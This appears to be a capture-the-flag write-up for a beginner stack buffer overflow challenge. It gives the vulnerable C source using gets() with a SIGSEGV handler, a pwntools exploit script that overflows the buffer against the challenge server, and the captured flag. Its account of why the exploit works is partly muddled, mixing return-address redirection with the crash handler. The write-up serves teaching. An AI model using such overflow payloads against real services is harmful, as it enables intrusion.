~# cat Question

If you scream loud enough, the flag will magically appear :)

nc challs.nusgreyhats.org 55433

FILES: chall, chall.c

chall.c

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>

// don't need to care about how this function works
// all you need to know is that this is the win function/the objective
void get_flag() {

	char flag[0x100];
	puts("You made it.");
	FILE* f = fopen("flag.txt", "r");
	if (f == NULL) {
		printf("An error has occurred. Contact an admin for help.");
		exit(-1);
	}
	flag[fread(flag, 0x1, 0x100, f)] = 0;
	fclose(f);

	puts(flag);
	exit(0);
}

void vuln() {
	char input[0x1000];

	// if we receive a SIGSEGV signal, we call the get_flag function
	signal(SIGSEGV, get_flag);

	puts("Give it your all. Scream all you can!");
	gets(input);
}

void setup() {
	setbuf(stdin, 0);
	setbuf(stdout, 0);
}

int main() {

	setup(); // ignore the setup
	vuln();
	puts("Almost there. Try harder!");
	return 0;
}

Understanding the script

• The vuln function reads input into the input buffer using the vulnerable gets function, which does not perform bounds checking and can lead to buffer overflow.

• Before reading input, it sets up a signal handler using signal(SIGSEGV, get_flag), which means if a segmentation fault occurs (SIGSEGV), the get_flag function will be called.

Exploit

from pwn import *

p = remote("challs.nusgreyhats.org", 55433)

payload = b"A" * 0x1000 # fill input buffer
payload += b"A" * 0x8   # fill saved rbp
payload += p64(0x0000000000001249) # 64-bit encode address to win

p.sendline(payload)

p.interactive()

Overview:

1. The exploit script uses the pwn library in Python to interact with the challenge server.

2. The payload is constructed to overflow the input buffer and overwrite the return address.

3. The payload consists of:

• b"A"0x1000: Fills the input buffer to cause a buffer overflow.

• b"A"0x8: Fills the saved base pointer (rbp) to maintain the stack alignment.

• p64(0x0000000000001249): Encodes the address of the get_flag function (0x0000000000001249 in this case) to overwrite the return address.

Triggering the Signal:

1. The exploit script sends the payload to the server using p.sendline(payload).

2. When the server receives the payload and overflows the input buffer, it will overwrite the return address on the stack with the address of the get_flag function.

3. This causes the program to continue execution at the get_flag function, which opens and reads the flag.txt file, giving us the flag.

In summary, the SIGSEGV signal is triggered by intentionally causing a buffer overflow in the vuln function.

Flag: flag{r3kt_d4_st4ck_hehe_good_warmup}